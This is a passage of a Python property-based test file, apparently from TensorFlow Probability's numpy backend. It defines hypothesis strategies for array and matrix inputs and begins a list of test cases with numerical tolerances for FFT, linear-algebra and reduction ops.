elements = hps.booleans()
else:
raise ValueError('Unexpected dtype: {}'.format(dtype))
shape = tuple(batch_shape) + draw(shape)
ensure_array = lambda x: onp.array(x, dtype=dtype)
if isinstance(elements, (list, tuple)):
return tuple([
draw(hnp.arrays(
dtype, shape, unique=unique, elements=e).map(ensure_array))
for e in elements
])
array_strategy = hnp.arrays(
dtype, shape, unique=unique, elements=elements).map(ensure_array)
if n == 1 and not as_tuple:
return draw(array_strategy)
return draw(hps.tuples(*([array_strategy] * n)))
single_arrays = functools.partial(n_same_shape, n=1, as_tuple=False)
@hps.composite
def array_axis_tuples(draw, strategy=None, elements=None, dtype=None,
allow_nan=ALLOW_NAN, allow_multi_axis=False):
x = draw(strategy or single_arrays(shape=shapes(min_dims=1),
elements=elements,
dtype=dtype,
allow_nan=allow_nan))
rank = len(x.shape)
if allow_multi_axis:
if draw(hps.booleans()): # Use None axis.
axis = None
else:
# Pick a set of distinct axes, then decide whether to index each one from
# the front or from the back.
axis = draw(hps.sets(hps.integers(-rank, -1)))
indexed_from_front = draw(hps.tuples(*[hps.booleans() for _ in axis]))
axis = tuple((ax + rank) if from_front else ax
for (ax, from_front) in zip(axis, indexed_from_front))
else:
axis = draw(hps.integers(-rank, rank - 1))
return x, axis
@hps.composite
def sliceable_and_slices(draw, strategy=None):
x = draw(strategy or single_arrays(shape=shapes(min_dims=1)))
starts = []
sizes = []
for dim in x.shape:
starts.append(draw(hps.integers(0, dim - 1)))
sizes.append(
draw(hps.one_of(hps.just(-1), hps.integers(0, dim - starts[-1]))))
return x, starts, sizes
@hps.composite
def one_hot_params(draw):
indices = draw(single_arrays(dtype=np.int32, elements=hps.integers(0, 8)))
depth = np.maximum(1, np.max(indices)).astype(np.int32)
dtype = draw(hps.sampled_from((onp.int32, onp.float32, onp.complex64)))
on_value = draw(hps.sampled_from((None, 1, 2)))
on_value = on_value if on_value is None else dtype(on_value)
off_value = draw(hps.sampled_from((None, 3, 7)))
off_value = off_value if off_value is None else dtype(off_value)
rank = indices.ndim
axis = draw(hps.one_of(hps.just(None), hps.integers(-1, rank - 1)))
return indices, depth, on_value, off_value, axis, dtype
@hps.composite
def array_and_diagonal(draw):
side = draw(hps.integers(1, 10))
shape = draw(shapes(min_dims=2, min_side=side, max_side=side))
array = draw(hnp.arrays(np.float64, shape, elements=floats(dtype=np.float64)))
diag = draw(hnp.arrays(np.float64, shape[:-1],
elements=floats(dtype=np.float64)))
return array, diag
@hps.composite
def matmul_compatible_pairs(draw,
                            dtype=np.float64,
                            x_strategy=None,
                            elements=None):
  """Draws a pair `(x, y)` with shapes compatible for `matmul(x, y)`."""
  elements = elements or floats(dtype=dtype)
  x_strategy = x_strategy or single_arrays(
      shape=shapes(min_dims=2, max_dims=5), dtype=dtype, elements=elements)
  x = draw(x_strategy)
  x_shape = tuple(map(int, x.shape))
  # y shares x's batch dims; its row count matches x's column count, and its
  # column count is drawn fresh.
  y_shape = x_shape[:-2] + x_shape[-1:] + (draw(hps.integers(1, 10)),)
  y = draw(hnp.arrays(dtype, y_shape, elements=elements))
  return x, y
@hps.composite
def pd_matrices(draw, eps=1.):
  """Draws batches of symmetric positive-definite matrices.

  Builds `x @ x^T` and adds `eps * I` to push eigenvalues strictly positive.
  """
  x = draw(
      single_arrays(
          shape=shapes(min_dims=2),
          elements=floats(min_value=-1e3, max_value=1e3)))
  y = np.swapaxes(x, -1, -2)
  if x.shape[-1] < x.shape[-2]:  # Ensure resultant matrix not rank-deficient.
    x, y = y, x
  psd = np.matmul(x, y)
  return psd + eps * np.eye(psd.shape[-1])
@hps.composite
def nonsingular_matrices(draw):
  """Draws nonsingular matrices: PD matrices with per-batch random signs."""
  mat = draw(pd_matrices())
  # Flipping the sign of a PD matrix preserves invertibility.
  signs = draw(
      hnp.arrays(
          mat.dtype,
          tuple(int(dim) for dim in mat.shape[:-2]) + (1, 1),
          elements=hps.sampled_from([-1., 1.])))
  return mat * signs
@hps.composite
def batched_probabilities(draw, batch_shape, num_classes):
  """Draws a batch of categorical probability vectors (softmax-normalized)."""
  probs = draw(single_arrays(
      batch_shape=batch_shape,
      shape=hps.just((num_classes,)),
      dtype=np.float32, elements=floats(dtype=np.float32)))
  # Numerically stable softmax: subtract the per-row max before exponentiating.
  probs = onp.exp(probs - onp.max(
      probs, axis=-1, keepdims=True))
  return probs / probs.sum(keepdims=True, axis=-1)
def tensorshapes_to_tuples(tensorshapes):
  """Converts an iterable of TensorShapes into a tuple of plain int-tuples."""
  converted = []
  for tensorshape in tensorshapes:
    converted.append(tuple(tensorshape.as_list()))
  return tuple(converted)
@hps.composite
def where_params(draw, version=2):
  """Draws `(condition, x, y)` arguments for tf.where.

  Version 2 allows all three arguments to broadcast against each other;
  version 1 only allows the condition to be a rank-<=1 prefix of the shape.
  """
  shape = draw(shapes())
  if version == 2:
    cond_shape, x_shape, y_shape = draw(
        tfp_hps.broadcasting_shapes(shape, 3).map(tensorshapes_to_tuples))
  elif version == 1:
    max_cond_ndim = min(1, len(shape))
    cond_dims = draw(hps.sampled_from(onp.arange(max_cond_ndim + 1)))
    cond_shape = shape[:cond_dims]
    x_shape, y_shape = shape, shape
  else:
    raise ValueError('unexpected tf.where version {}'.format(version))
  condition = draw(single_arrays(shape=hps.just(cond_shape), dtype=np.bool_))
  x = draw(single_arrays(shape=hps.just(x_shape)))
  y = draw(single_arrays(shape=hps.just(y_shape), dtype=x.dtype))
  return condition, x, y
@hps.composite
def normal_params(draw):
  """Draws `(shape, mean, stddev, dtype)` arguments for random.normal."""
  shape = draw(shapes())
  arg_shapes = draw(
      tfp_hps.broadcasting_shapes(shape, 3).map(tensorshapes_to_tuples))
  include_arg = draw(hps.lists(hps.booleans(), min_size=2, max_size=2))
  dtype = draw(hps.sampled_from([np.float32, np.float64]))
  # mean/stddev are each either a broadcast-compatible array or the scalar
  # default (0 and 1 respectively).
  mean = (
      draw(single_arrays(shape=hps.just(arg_shapes[1]), dtype=dtype,
                         elements=floats(dtype=dtype)))
      if include_arg[0] else 0)
  stddev = (
      draw(single_arrays(shape=hps.just(arg_shapes[2]), dtype=dtype,
                         elements=positive_floats(dtype=dtype)))
      if include_arg[1] else 1)
  return (arg_shapes[0], mean, stddev, dtype)
@hps.composite
def uniform_params(draw):
  """Draws `(shape, minval, maxval, dtype)` arguments for random.uniform.

  `maxval` is built as `minval + positive offset` so the interval is valid.
  """
  shape = draw(shapes())
  arg_shapes = draw(
      tfp_hps.broadcasting_shapes(shape, 3).map(tensorshapes_to_tuples))
  include_arg = draw(hps.lists(hps.booleans(), min_size=2, max_size=2))
  dtype = draw(hps.sampled_from([np.int32, np.int64, np.float32, np.float64]))
  if dtype == np.int32 or dtype == np.int64:
    # TF RandomUniformInt only supports scalar min/max.
    arg_shapes = (arg_shapes[0], (), ())
    elements = integers(), integers(min_value=1)
  else:
    elements = floats(dtype=dtype), positive_floats(dtype=dtype)
  minval = (
      draw(single_arrays(shape=hps.just(arg_shapes[1]), dtype=dtype,
                         elements=elements[0]))
      if include_arg[0] else dtype(0))
  maxval = minval + (
      draw(single_arrays(shape=hps.just(arg_shapes[2]), dtype=dtype,
                         elements=elements[1]))
      if include_arg[1] else dtype(10))
  return (arg_shapes[0], minval, maxval, dtype)
def gamma_params():
  """Returns a strategy for `(sample_shape, alpha, beta, dtype)` gamma args."""
  def dict_to_params(d):
    # Unpacks the drawn dictionary into the positional argument tuple.
    return (d['shape'],  # sample shape
            d['params'][0].astype(d['dtype']),  # alpha
            (d['params'][1].astype(d['dtype'])  # beta (or None)
             if d['include_beta'] else None),
            d['dtype'])  # dtype
  return hps.fixed_dictionaries(
      dict(shape=shapes(),
           # TODO(jburnim): Support generating float64 params.
           params=n_same_shape(n=2, elements=positive_floats(dtype=np.float32)),
           include_beta=hps.booleans(),
           dtype=hps.sampled_from([np.float32, np.float64]))
  ).map(dict_to_params)  # dtype
@hps.composite
def bincount_params(draw):
  """Draws `(arr, weights, minlength)` arguments for math.bincount."""
  num_buckets = draw(hps.integers(2, 20))
  # minlength is None or at least as large as the bucket count.
  minlength = draw(hps.one_of(
      hps.just(None),
      hps.integers(num_buckets, num_buckets + 3),
  ))
  arr = draw(single_arrays(dtype=np.int32,
                           shape=hps.just(tuple()),
                           batch_shape=(num_buckets,),
                           elements=hps.integers(
                               0, num_buckets - 1)))
  weights = draw(hps.one_of(
      hps.just(None),
      single_arrays(dtype=np.int32,
                    shape=hps.just(tuple()),
                    batch_shape=(num_buckets,),
                    elements=hps.integers(0, 4))))
  return arr, weights, minlength
@hps.composite
def confusion_matrix_params(draw):
  """Draws `(labels, predictions, num_classes, weights)` for confusion_matrix."""
  num_labels = draw(hps.integers(1, 8))
  labels = draw(single_arrays(
      dtype=np.int32,
      shape=hps.just(tuple()),
      batch_shape=(num_labels,),
      elements=hps.integers(0, num_labels - 1)))
  predictions = draw(single_arrays(
      dtype=np.int32,
      shape=hps.just(tuple()),
      batch_shape=(num_labels,),
      elements=hps.integers(0, num_labels - 1)))
  # num_classes is None (inferred) or at least as large as any label value.
  num_classes = draw(hps.one_of(
      hps.just(None),
      hps.integers(num_labels, num_labels + 3)))
  weights = draw(hps.one_of(
      hps.just(None),
      single_arrays(dtype=np.int32,
                    shape=hps.just(tuple()),
                    batch_shape=(num_labels,),
                    elements=hps.integers(0, 4))))
  return labels, predictions, num_classes, weights
@hps.composite
def gather_params(draw):
  """Draws `(params, indices, validate_indices, axis, batch_dims)` for gather."""
  params_shape = shapes(min_dims=1)
  params = draw(single_arrays(shape=params_shape))
  rank = len(params.shape)
  # Restricting batch_dims to be positive for now
  # Batch dims can only be > 0 if rank > 1
  batch_dims = draw(hps.integers(0, max(0, rank - 2)))
  # Axis is constrained to be >= batch_dims
  axis = draw(hps.one_of(
      hps.integers(batch_dims, rank - 1),
      hps.integers(-rank + batch_dims, -1),
  ))
  # Index values must be in range for the gathered axis.
  elements = hps.integers(0, params.shape[axis] - 1)
  indices_shape = shapes(min_dims=batch_dims + 1)
  batch_shape = params.shape[:batch_dims]
  indices = draw(single_arrays(dtype=np.int32, elements=elements,
                               shape=indices_shape,
                               batch_shape=batch_shape))
  return params, indices, None, axis, batch_dims
@hps.composite
def gather_nd_params(draw):
  """Draws `(params, indices, batch_dims, name)` arguments for gather_nd.

  Index columns are drawn one at a time (each in range for its corresponding
  params dimension) and concatenated along the last axis.
  """
  if JAX_MODE:
    # Restricting batch_dims to be positive for now
    batch_dims = draw(hps.integers(min_value=0, max_value=4))
  else:
    batch_dims = 0
  if batch_dims == 0:
    batch_shape = ()
  else:
    batch_shape = draw(shapes(min_dims=batch_dims, max_dims=batch_dims))

  params = draw(single_arrays(
      shape=hps.just(batch_shape + draw(shapes(min_dims=1)))
  ))
  params_shape = params.shape
  rank = len(params_shape)

  indices_shape = draw(hps.integers(min_value=1, max_value=rank - batch_dims))
  indices_batch_shape = draw(shapes())
  batches = []
  for idx in range(indices_shape):
    batches.append(
        draw(single_arrays(
            dtype=np.int32,
            elements=hps.integers(
                0, params.shape[batch_dims + idx] - 1
            ),
            batch_shape=batch_shape + indices_batch_shape,
            shape=hps.just((1,))
        ))
    )
  indices = np.concatenate(batches, -1)
  return params, indices, batch_dims, None
@hps.composite
def repeat_params(draw):
  """Draws `(input, repeats, axis)` arguments for tf.repeat.

  Repeats is either a scalar (possibly wrapped in a length-1 array) or a
  per-element vector matching the size along `axis`.
  """
  input_array = draw(single_arrays())
  rank = input_array.ndim
  low, high = -rank, rank - 1
  # min/max normalizes the degenerate rank-0 case where low > high.
  low, high = min(low, high), max(low, high)
  axis = draw(hps.one_of(hps.just(None), hps.integers(low, high)))
  if draw(hps.booleans()):
    repeats = draw(hps.integers(1, 20))
    if draw(hps.booleans()):
      repeats = np.array([repeats])
    return input_array, repeats, axis
  if rank < 1:
    repeats_shape = draw(hps.one_of(hps.just(()), hps.just((1,))))
  else:
    repeats_shape = (input_array.shape[axis] if axis is not None
                     else np.size(input_array),)
  repeats = draw(hnp.arrays(dtype=np.int32, shape=repeats_shape,
                            elements=hps.integers(1, 20)))
  return input_array, repeats, axis
@hps.composite
def linspace_params(draw):
  """Draws keyword arguments `(start, stop, num, axis)` for tf.linspace."""
  shape = draw(shapes())
  arg_shapes = draw(
      tfp_hps.broadcasting_shapes(shape, 2).map(tensorshapes_to_tuples))
  valid_dtypes = [np.int32, np.int64, np.float32, np.float64, np.complex64]
  if not FLAGS.use_tpu:
    valid_dtypes.append(np.complex128)
  dtype = draw(hps.sampled_from(valid_dtypes))
  start = draw(single_arrays(shape=hps.just(arg_shapes[0]), dtype=dtype))
  stop = draw(single_arrays(shape=hps.just(arg_shapes[1]), dtype=dtype))
  num = draw(hps.integers(0, 13))
  axis = draw(hps.integers(-len(shape) - 1, len(shape)))
  return Kwargs(start=start, stop=stop, num=num, axis=axis)
@hps.composite
def searchsorted_params(draw):
  """Draws `(sorted_sequence, values, side)` arguments for tf.searchsorted."""
  array_shape = shapes(min_dims=1)
  array = draw(single_arrays(shape=array_shape))
  # JAX and TF's searchsorted do not behave the same for negative zero, so we
  # avoid generating inputs containing negative zero. See b/213512538 .
  sorted_array = np.sort(np.where(array == -0.0, 0.0, array))
  num_values = hps.integers(1, 20)
  values = draw(single_arrays(
      shape=shapes(min_dims=1, max_dims=1, max_side=draw(num_values)),
      batch_shape=sorted_array.shape[:-1]))
  values = np.where(values == -0.0, 0.0, values)
  search_side = draw(hps.one_of(hps.just('left'), hps.just('right')))
  return sorted_array, values, search_side
@hps.composite
def segment_ids(draw, n):
  """Draws a sorted segment-id vector covering positions [0, n).

  Partitions the range into consecutive segments of random positive length
  and labels each position with its segment index.
  """
  segment_lengths = []
  covered = 0
  while covered < n:
    next_length = draw(hps.integers(1, n - covered))
    segment_lengths.append(next_length)
    covered += next_length
  return np.repeat(np.arange(len(segment_lengths)),
                   np.array(segment_lengths))
@hps.composite
def segment_params(draw, shape=shapes(min_dims=1), dtype=None, elements=None,
                   batch_shape=(), unique=False):
  """Draws `(data, segment_ids)` arguments for the math.segment_* ops."""
  a = draw(single_arrays(shape=shape, dtype=dtype, elements=elements,
                         batch_shape=batch_shape, unique=unique))
  ids = draw(segment_ids(a.shape[0]))
  return (a, ids)
@hps.composite
def top_k_params(draw):
  """Draws `(input, k)` arguments for math.top_k with k in range."""
  array_shape = shapes(min_dims=1)
  # TODO(srvasude): The unique check can be removed once
  # https://github.com/google/jax/issues/2124 is resolved.
  array = draw(single_arrays(dtype=np.float32, unique=True, shape=array_shape))
  k = draw(hps.integers(1, int(array.shape[-1])))
  return array, k
@hps.composite
def histogram_fixed_width_bins_params(draw):
  """Draws `(values, [value_min, value_max], nbins)` for histogram bin ops.

  The value range either matches the data's min/max exactly or is widened by
  3 on either side.
  """
  # TODO(b/187125431): the `min_side=2` and `unique` check can be removed if
  # https://github.com/tensorflow/tensorflow/pull/38899 is re-implemented.
  subnormal_kwarg = _maybe_get_subnormal_kwarg()
  values = draw(single_arrays(
      dtype=np.float32,
      shape=shapes(min_dims=1, min_side=2),
      unique=True,
      # Avoid intervals containing 0 due to NP/TF discrepancy for bin boundaries
      # near 0.
      elements=hps.floats(min_value=0., max_value=1e10, width=32,
                          **subnormal_kwarg),
  ))
  vmin, vmax = np.min(values), np.max(values)
  value_min = draw(hps.one_of(
      hps.just(vmin),
      hps.just(vmin - 3))).astype(np.float32)
  value_max = draw(hps.one_of(
      hps.just(vmax),
      hps.just(vmax + 3))).astype(np.float32)
  nbins = draw(hps.integers(2, 10))
  return values, [value_min, value_max], nbins
@hps.composite
def histogram_fixed_width_params(draw):
  """Like histogram_fixed_width_bins_params, but guarantees a nonempty range."""
  values, [value_min, value_max], nbins = draw(
      histogram_fixed_width_bins_params())
  # Ensure value_max strictly exceeds value_min so bin width is positive.
  return (values,
          [value_min, max(value_max,
                          value_min + np.asarray(.1, value_min.dtype))],
          nbins)
@hps.composite
def argsort_params(draw):
  """Draws `(values, axis, direction, stable)` arguments for tf.argsort."""
  dtype = None
  if FLAGS.test_mode == 'xla':  # Double not supported by XLA TopKV2.
    dtype = np.float32
  return (
      draw(array_axis_tuples(dtype=dtype)) +
      (draw(hps.sampled_from(['ASCENDING', 'DESCENDING'])),
       True))  # stable sort
@hps.composite
def conv2d_params(draw):
  """Draws `(input, filters, strides, padding, data_format)` for nn.conv2d.

  Strides may be a scalar, a 2-tuple, or a full rank-4 tuple; padding is
  'SAME', 'VALID', or an explicit per-dimension specification.
  """
  # NCHW is GPU-only
  # data_format = draw(hps.sampled_from(['NHWC', 'NCHW']))
  data_format = draw(hps.just('NHWC'))
  input_shape = draw(shapes(4, 4, min_side=2, max_side=10))
  if data_format.startswith('NC'):
    channels = input_shape[1]
  else:
    channels = input_shape[3]
  filter_shape = draw(shapes(3, 3, min_side=1, max_side=4))
  # Input channels of the filter must match the image's channel count.
  filter_shape = filter_shape[:2] + (channels, filter_shape[-1])

  input_ = draw(
      single_arrays(
          batch_shape=(),
          shape=hps.just(input_shape),
      ))
  filters = draw(single_arrays(
      batch_shape=(),
      shape=hps.just(filter_shape),
  ))
  small = hps.integers(0, 5)
  small_pos = hps.integers(1, 5)
  strides = draw(hps.one_of(small_pos, hps.tuples(small_pos, small_pos)))
  if isinstance(strides, tuple) and len(strides) == 2 and draw(hps.booleans()):
    # Optionally expand to the full rank-4 strides form.
    if data_format.startswith('NC'):
      strides = (1, 1) + strides
    else:
      strides = (1,) + strides + (1,)

  zeros = (0, 0)
  explicit_padding = (
      draw(hps.tuples(small, small)),
      draw(hps.tuples(small, small)),
  )
  if data_format.startswith('NC'):
    explicit_padding = (zeros, zeros) + explicit_padding
  else:
    explicit_padding = (zeros,) + explicit_padding + (zeros,)
  padding = draw(
      hps.one_of(
          hps.just(explicit_padding), hps.sampled_from(['SAME', 'VALID'])))
  return (input_, filters, strides, padding, data_format)
@hps.composite
def sparse_xent_params(draw):
  """Draws `labels`/`logits` kwargs for sparse_softmax_cross_entropy."""
  num_classes = draw(hps.integers(1, 6))
  batch_shape = draw(shapes(min_dims=1))
  # Labels are integer class ids; logits carry one score per class.
  labels = single_arrays(
      batch_shape=batch_shape,
      shape=hps.just(tuple()),
      dtype=np.int32,
      elements=hps.integers(0, num_classes - 1))
  subnormal_kwarg = _maybe_get_subnormal_kwarg()
  logits = single_arrays(
      batch_shape=batch_shape,
      shape=hps.just((num_classes,)),
      elements=hps.floats(min_value=-1e5, max_value=1e5, width=32,
                          **subnormal_kwarg))
  return draw(
      hps.fixed_dictionaries(dict(
          labels=labels, logits=logits)).map(Kwargs))
@hps.composite
def xent_params(draw):
  """Draws `labels`/`logits` kwargs for softmax_cross_entropy.

  Unlike sparse_xent_params, labels here are full probability vectors.
  """
  num_classes = draw(hps.integers(1, 6))
  batch_shape = draw(shapes(min_dims=1))
  labels = batched_probabilities(
      batch_shape=batch_shape, num_classes=num_classes)
  subnormal_kwarg = _maybe_get_subnormal_kwarg()
  logits = single_arrays(
      batch_shape=batch_shape,
      shape=hps.just((num_classes,)),
      elements=hps.floats(min_value=-1e5, max_value=1e5, width=32,
                          **subnormal_kwarg))
  return draw(
      hps.fixed_dictionaries(dict(
          labels=labels, logits=logits)).map(Kwargs))
def _svd_post_process(vals):
# SVDs are not unique, so reconstruct input to test consistency (b/154538680).
# create_uv = False
if not isinstance(vals, tuple):
return vals
# create_uv = True
s, u, v = (np.array(x) for x in vals)
return np.matmul(
u,
s[..., None] *
# Vectorized matrix transpose.
np.swapaxes(v, -2, -1))
@hps.composite
def qr_params(draw):
  """Draws `(matrix, full_matrices)` arguments for linalg.qr."""
  full_matrices = draw(hps.booleans())
  valid_dtypes = [np.float64]
  if FLAGS.test_mode != 'xla':  # XLA does not support complex QR.
    valid_dtypes.append(np.complex128)
  dtype = draw(hps.sampled_from(valid_dtypes))
  if dtype == np.float64:
    elements = floats(min_value=-1e6, max_value=1e6, dtype=dtype)
  else:
    elements = complex_numbers(min_magnitude=0., max_magnitude=1e6, dtype=dtype)
  arr = draw(single_arrays(dtype=dtype, shape=shapes(min_dims=2),
                           elements=elements))
  return arr, full_matrices
def _qr_post_process(qr):
"""Values of q corresponding to zero values of r may have arbitrary values."""
return np.matmul(qr.q, qr.r), np.float32(qr.q.shape), np.float32(qr.r.shape)
def _eig_post_process(vals):
if not isinstance(vals, tuple):
return np.sort(vals, axis=-1)
e, v = vals
return np.einsum('...ab,...b,...bc->...ac', v, e, v.swapaxes(-1, -2))
def _reduce_logsumexp_no_scipy(*args, **kwargs):
  """Runs nptf.reduce_logsumexp with scipy's logsumexp forcibly unavailable.

  Exercises the pure-numpy fallback path by patching
  `scipy_special.logsumexp` to raise for the duration of the call.
  """
  def _not_implemented(*args, **kwargs):
    raise NotImplementedError()

  with mock.patch.object(scipy_special, 'logsumexp', _not_implemented):
    return nptf.reduce_logsumexp(*args, **kwargs)
# __Currently untested:__
# broadcast_dynamic_shape
# broadcast_static_shape
# broadcast_to
# math.accumulate_n
# math.betainc
# math.igamma
# math.igammac
# math.lbeta
# math.polyval
# math.zeta
# random.poisson
# random.set_seed
# TODO(jamieas): add tests for these functions.
# Strategy-driven test cases: each TestCase names a function under test and
# supplies hypothesis strategies for its arguments, plus per-platform
# tolerances, post-processors, and disable flags.
NUMPY_TEST_CASES = [

    TestCase(
        'signal.fft', [
            single_arrays(
                shape=fft_shapes(fft_dim=1),
                dtype=np.complex64,
                elements=complex_numbers(max_magnitude=1e3))
        ],
        atol=1e-4,
        rtol=1e-4,
        xla_atol=5e-4),
    TestCase(
        'signal.fft2d', [
            single_arrays(
                shape=fft_shapes(fft_dim=2),
                dtype=np.complex64,
                elements=complex_numbers(max_magnitude=1e3))
        ],
        atol=1e-4,
        rtol=1e-4),
    TestCase(
        'signal.fft3d', [
            single_arrays(
                shape=fft_shapes(fft_dim=3, max_fft_size=16),
                dtype=np.complex64,
                elements=complex_numbers(max_magnitude=1e3))
        ],
        atol=2e-3,
        rtol=2e-3),
    TestCase(
        'signal.rfft', [
            single_arrays(
                shape=fft_shapes(fft_dim=1),
                dtype=np.float32,
                elements=floats(min_value=-1e3, max_value=1e3,
                                dtype=np.float32))
        ],
        atol=1e-4,
        rtol=1e-4,
        xla_atol=3e-4),
    TestCase(
        'signal.rfft2d', [
            single_arrays(
                shape=fft_shapes(fft_dim=2),
                dtype=np.float32,
                elements=floats(min_value=-1e3, max_value=1e3,
                                dtype=np.float32))
        ],
        atol=1e-3,
        rtol=1e-3),
    TestCase(
        'signal.rfft3d', [
            single_arrays(
                shape=fft_shapes(fft_dim=3, max_fft_size=16),
                dtype=np.float32,
                elements=floats(min_value=-1e3, max_value=1e3,
                                dtype=np.float32))
        ],
        atol=1e-2,
        rtol=2e-3),
    TestCase(
        'signal.ifft', [
            single_arrays(
                shape=fft_shapes(fft_dim=1),
                dtype=np.complex64,
                elements=complex_numbers(max_magnitude=1e3))
        ],
        atol=1e-4,
        rtol=1e-4),
    TestCase(
        'signal.ifft2d', [
            single_arrays(
                shape=fft_shapes(fft_dim=2),
                dtype=np.complex64,
                elements=complex_numbers(max_magnitude=1e3))
        ],
        atol=1e-4,
        rtol=1e-4),
    TestCase(
        'signal.ifft3d', [
            single_arrays(
                shape=fft_shapes(fft_dim=3, max_fft_size=16),
                dtype=np.complex64,
                elements=complex_numbers(max_magnitude=1e3))
        ],
        atol=1e-4,
        rtol=1e-4),
    TestCase(
        'signal.irfft', [
            single_arrays(
                shape=fft_shapes(fft_dim=1),
                dtype=np.complex64,
                elements=complex_numbers(max_magnitude=1e3))
        ],
        atol=3e-4,
        rtol=3e-4),
    TestCase(
        'signal.irfft2d', [
            single_arrays(
                shape=fft_shapes(fft_dim=2),
                dtype=np.complex64,
                elements=complex_numbers(max_magnitude=5e2))
        ],
        atol=2e-4,
        rtol=2e-4),
    TestCase(
        'signal.irfft3d', [
            single_arrays(
                shape=fft_shapes(fft_dim=3, max_fft_size=16),
                dtype=np.complex64,
                elements=complex_numbers(max_magnitude=1e3))
        ],
        atol=4e-4,
        rtol=4e-4),

    # ArgSpec(args=['a', 'b', 'transpose_a', 'transpose_b', 'adjoint_a',
    #               'adjoint_b', 'a_is_sparse', 'b_is_sparse', 'name'],
    #         varargs=None,
    #         keywords=None,
    #         defaults=(False, False, False, False, False, False, None))
    TestCase('linalg.matmul', [matmul_compatible_pairs()]),
    TestCase(
        'linalg.eig', [pd_matrices()],
        post_processor=_eig_post_process,
        xla_disabled=True),
    TestCase('linalg.eigh', [pd_matrices()], post_processor=_eig_post_process),
    TestCase(
        'linalg.eigvals', [pd_matrices()],
        post_processor=_eig_post_process,
        xla_disabled=True),
    TestCase(
        'linalg.eigvalsh', [pd_matrices()], post_processor=_eig_post_process),
    TestCase(
        'linalg.det', [nonsingular_matrices()], rtol=1e-3,
        xla_disabled=True),  # TODO(b/162937268): missing kernel.

    # ArgSpec(args=['a', 'name', 'conjugate'], varargs=None, keywords=None)
    TestCase('linalg.matrix_transpose',
             [single_arrays(shape=shapes(min_dims=2))]),
    TestCase('linalg.trace', [nonsingular_matrices()]),

    # ArgSpec(args=['a', 'x', 'name'], varargs=None, keywords=None,
    #         defaults=(None,))
    TestCase(
        'math.polygamma', [
            hps.tuples(hps.integers(0, 10).map(float), positive_floats()),
        ],
        disabled=JAX_MODE,
        xla_disabled=True),  # TODO(b/163880625): Polygamma kernel

    # ArgSpec(args=['arr', 'weights', 'minlength',
    #               'maxlength', 'dtype', 'name'],
    #         varargs=None,
    #         keywords=None,
    #         defaults=(None, None, None, tf.int32, None))
    TestCase('math.bincount', [bincount_params()],
             xla_disabled=True),  # missing kernel.
    TestCase(
        'math.confusion_matrix', [confusion_matrix_params()],
        xla_disabled=True),  # broken string-using assert.
    TestCase('math.top_k', [top_k_params()], xla_const_args=(1,)),

    # ArgSpec(args=['chol', 'rhs', 'name'], varargs=None, keywords=None,
    #         defaults=(None,))
    TestCase('linalg.cholesky_solve', [
        matmul_compatible_pairs(
            x_strategy=pd_matrices().map(np.linalg.cholesky))
    ]),

    # ArgSpec(args=['tensor', 'full_matrices', 'compute_uv', 'name'],
    #         varargs=None,
    #         keywords=None,
    #         defaults=(False, True, None))
    TestCase(
        'linalg.svd', [single_arrays(
            shape=shapes(min_dims=2),
            elements=floats(min_value=-1e10, max_value=1e10))],
        post_processor=_svd_post_process),
    TestCase(
        'linalg.qr', [
            qr_params(),
        ],
        post_processor=_qr_post_process,
        xla_const_args=(1,)),  # full_matrices

    # ArgSpec(args=['coeffs', 'x', 'name'], varargs=None, keywords=None,
    #         defaults=(None,))
    TestCase('math.polyval', []),

    # ArgSpec(args=['diagonal', 'name'], varargs=None, keywords=None,
    #         defaults=(None,))
    TestCase('linalg.diag', [single_arrays(shape=shapes(min_dims=1))]),

    # ArgSpec(args=['features', 'name'], varargs=None, keywords=None,
    #         defaults=(None,))
    TestCase('math.softsign', [single_arrays()]),

    # ArgSpec(args=['input', 'axis', 'keepdims', 'dtype', 'name'], varargs=None,
    #         keywords=None, defaults=(None, None, tf.int64, None))
    TestCase('math.count_nonzero', [single_arrays()]),

    # ArgSpec(args=['input', 'axis', 'output_type', 'name'], varargs=None,
    #         keywords=None, defaults=(None, tf.int64, None))
    TestCase('math.argmax', [array_axis_tuples()], xla_const_args=(1,)),
    TestCase('math.argmin', [array_axis_tuples()], xla_const_args=(1,)),

    # ArgSpec(args=['input', 'diagonal', 'name'], varargs=None, keywords=None,
    #         defaults=(None,))
    TestCase('linalg.set_diag', [array_and_diagonal()]),

    # ArgSpec(args=['input', 'name'], varargs=None, keywords=None,
    #         defaults=(None,))
    TestCase('math.angle',
             [single_arrays(dtype=np.complex64, elements=complex_numbers())]),
    TestCase('math.imag',
             [single_arrays(dtype=np.complex64, elements=complex_numbers())]),
    TestCase('math.real',
             [single_arrays(dtype=np.complex64, elements=complex_numbers())]),
    TestCase('linalg.cholesky', [pd_matrices()]),
    TestCase(
        'linalg.lu',
        [nonsingular_matrices()],
        rtol=1e-4,
        # TODO(b/161242015) do not disable unconditionally.  Was
        # disabled=NUMPY_MODE and six.PY2
        disabled=True),
    TestCase('linalg.diag_part', [single_arrays(shape=shapes(min_dims=2))]),
    TestCase(
        'raw_ops.MatrixDiagPartV2', [
            hps.fixed_dictionaries(
                dict(
                    input=single_arrays(shape=shapes(min_dims=2, min_side=2)),
                    k=hps.sampled_from([-1, 0, 1]),
                    padding_value=hps.just(0.))).map(Kwargs)
        ],
        xla_const_args=('k',)),
    TestCase('identity', [single_arrays()]),

    # ArgSpec(args=['input', 'num_lower', 'num_upper', 'name'], varargs=None,
    #         keywords=None, defaults=(None,))
    TestCase('linalg.band_part', [
        hps.tuples(
            single_arrays(shape=shapes(min_dims=2, min_side=3)),
            hps.integers(min_value=-1, max_value=3),
            hps.integers(min_value=-1, max_value=3))
    ]),

    # ArgSpec(args=['input', 'shape', 'name'], varargs=None, keywords=None,
    #         defaults=(None,))
    TestCase('broadcast_to', []),

    # ArgSpec(args=['input_tensor', 'axis', 'keepdims', 'name'], varargs=None,
    #         keywords=None, defaults=(None, False, None))
    TestCase(
        'math.reduce_all', [
            array_axis_tuples(
                single_arrays(
                    shape=shapes(min_dims=1),
                    dtype=np.bool_,
                    elements=hps.booleans()),
                allow_multi_axis=True)
        ],
        xla_const_args=(1,)),
    TestCase(
        'math.reduce_any', [
            array_axis_tuples(
                single_arrays(
                    shape=shapes(min_dims=1),
                    dtype=np.bool_,
                    elements=hps.booleans()))
        ],
        xla_const_args=(1,)),
    TestCase(
        'math.reduce_logsumexp', [array_axis_tuples(allow_multi_axis=True)],
        xla_const_args=(1,)),
    TestCase(
        'math.reduce_logsumexp_no_scipy',
        [array_axis_tuples(allow_multi_axis=True)],
        xla_const_args=(1,),
        tensorflow_function=tf.math.reduce_logsumexp,
